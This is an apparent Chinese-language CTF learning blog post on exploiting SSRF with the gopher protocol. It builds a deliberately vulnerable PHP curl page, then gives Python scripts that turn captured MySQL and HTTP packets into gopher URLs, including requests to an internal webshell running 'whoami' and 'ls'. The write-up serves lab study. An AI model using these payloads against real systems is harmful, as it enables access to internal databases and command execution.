SSRF Mysql 學習記錄

SSRF 與內網 MYSQL 學習記錄

1.前情提要

做到一道CTF題需要，結合網絡上各位大佬的經驗把過程結合總結學習了一下。

參考：https://xz.aliyun.com/t/6993

萌新做題隨機需求學習（順便第一次嘗試規范格式寫博客）

2.環境搭建

首先自己本地搭建APACHE/NGINX PHP環境測試

KALI2020服務機 :10.0.0.135

win10客戶機

ssrf.php

<?php
$ch = curl_init(); // 創建一個新cURL資源
curl_setopt($ch, CURLOPT_URL, $_GET['url']); // 設置URL和相應的選項
#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
curl_exec($ch); // 抓取URL並把它傳遞給瀏覽器
curl_close($ch); // 關閉cURL資源，並且釋放系統資源
?>

啟動mysql,創建一個無密碼的測試用戶curl

訪問http://10.0.0.135/ssrf.php?url=https://www.baidu.com  確認環境搭建成功

 

3.本地測試

1.數據處理

kali2020打開wireshark 過濾填入"mysql"

終端terminal

輸入 mysql -h 127.0.0.1 -u curl -p  登陸Mysql 

輸入mysql命令  select now();

　　　　　　　　exit;

此時看wireshark

選擇 追蹤流——>TCP流

選擇發送到3306端口的數據 ，顯示和保存數據為 原始數據   如圖

將原始數據 復制出來,去掉換行符縮為一行。

bb00000184a69f20000000012d00000000000000000000000000000000000000070000006375726c00006d7973716c5f6e61746976655f70617373776f7264007e035f6f73054c696e75780c5f636c69656e745f6e616d650a6c69626d617269616462045f7069640531393234380f5f636c69656e745f76657273696f6e05332e312e36095f706c6174666f726d067838365f36340c70726f6772616d5f6e616d65056d7973716c0c5f7365727665725f686f7374093132372e302e302e31210000000373656c65637420404076657273696f6e5f636f6d6d656e74206c696d697420310d0000000373656c656374206e6f7728290100000001

進行url編碼。

2.gopher協議測試

kali2020開兩個終端好進行對比

h被吞掉了  所以添加一個占位符_再試試

3.使用

結合一二對mysql用gopher進行數據發送，對處理好的一行數據進行

pocmake.py

#encoding:utf-8

def result(s):
    a=[s[i:i+2] for i in xrange(0,len(s),2)]
    return "curl gopher://127.0.0.1:3306/_%" + "%".join(a)

if __name__ == '__main__':
    import sys
    s=sys.argv[1]
    print result(s)

root@kali:~/桌面# python pocmake.py bb00000184a69f20000000012d00000000000000000000000000000000000000070000006375726c00006d7973716c5f6e61746976655f70617373776f7264007e035f6f73054c696e75780c5f636c69656e745f6e616d650a6c69626d617269616462045f7069640531393234380f5f636c69656e745f76657273696f6e05332e312e36095f706c6174666f726d067838365f36340c70726f6772616d5f6e616d65056d7973716c0c5f7365727665725f686f7374093132372e302e302e31210000000373656c65637420404076657273696f6e5f636f6d6d656e74206c696d697420310d0000000373656c656374206e6f7728290100000001
curl gopher://127.0.0.1:3306/_%bb%00%00%01%84%a6%9f%20%00%00%00%01%2d%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%07%00%00%00%63%75%72%6c%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%7e%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%0a%6c%69%62%6d%61%72%69%61%64%62%04%5f%70%69%64%05%31%39%32%34%38%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%05%33%2e%31%2e%36%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%0c%5f%73%65%72%76%65%72%5f%68%6f%73%74%09%31%32%37%2e%30%2e%30%2e%31%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31%0d%00%00%00%03%73%65%6c%65%63%74%20%6e%6f%77%28%29%01%00%00%00%01
root@kali:~/桌面# curl gopher://127.0.0.1:3306/_%bb%00%00%01%84%a6%9f%20%00%00%00%01%2d%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%07%00%00%00%63%75%72%6c%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%7e%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%0a%6c%69%62%6d%61%72%69%61%64%62%04%5f%70%69%64%05%31%39%32%34%38%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%05%33%2e%31%2e%36%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%0c%5f%73%65%72%76%65%72%5f%68%6f%73%74%09%31%32%37%2e%30%2e%30%2e%31%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31%0d%00%00%00%03%73%65%6c%65%63%74%20%6e%6f%77%28%29%01%00%00%00%01 --output -
[
curl: (56) Recv failure: 連接被對方重設
5.5.5-10.3.21-MariaDB-2Gkc0c%*E[��-��ztX<aS][1!OLmysql_native_password'def@@version_comment
                                                                                           -X�'�Debian buildd-unstable�efnow()
                   ?
                    ��2020-03-16 05:52:00�root@kali:~/桌面# 

4.拓展延申

實戰的mysql有密碼...所以，無法通過數據庫了，直接通過gopher來GET/POST 該題內網自帶的webshell

https:////www.cnblogs.com/Zhu013/p/12540419.html

參考學習自己做的數據包復雜版本

burp抓包數據改HOST

GET /exp.php?cmd=whoami HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

踩坑記錄，二次編碼url和空格換行問題折騰了很久..最后必須要有兩個%0a%0d也就是回車換行，否則訪問超時(?)，寫成poc如下

 newpoc.py

#coding:utf-8
from urllib import quote

def hex():
        #post 數據 通過BP抓包獲取
        f = open('post.txt')
        post = f.read()
        s = post.encode('hex')
        return s
def results(s):
    a=[s[i:i+2] for i in xrange(0,len(s),2)]
    return "gopher://127.0.0.1:80/_%"+"%".join(a)


if __name__=="__main__":

    results = results(hex())
    # url訪問需再次編碼
    url = quote(results)
    print(url)

 writeup經驗版本

空格用%20代替，'?'用%253F代替，'+'用%2b代替

直接寫  gopher://127.0.0.1:80/_GET%20/test.php%253fcmd=ls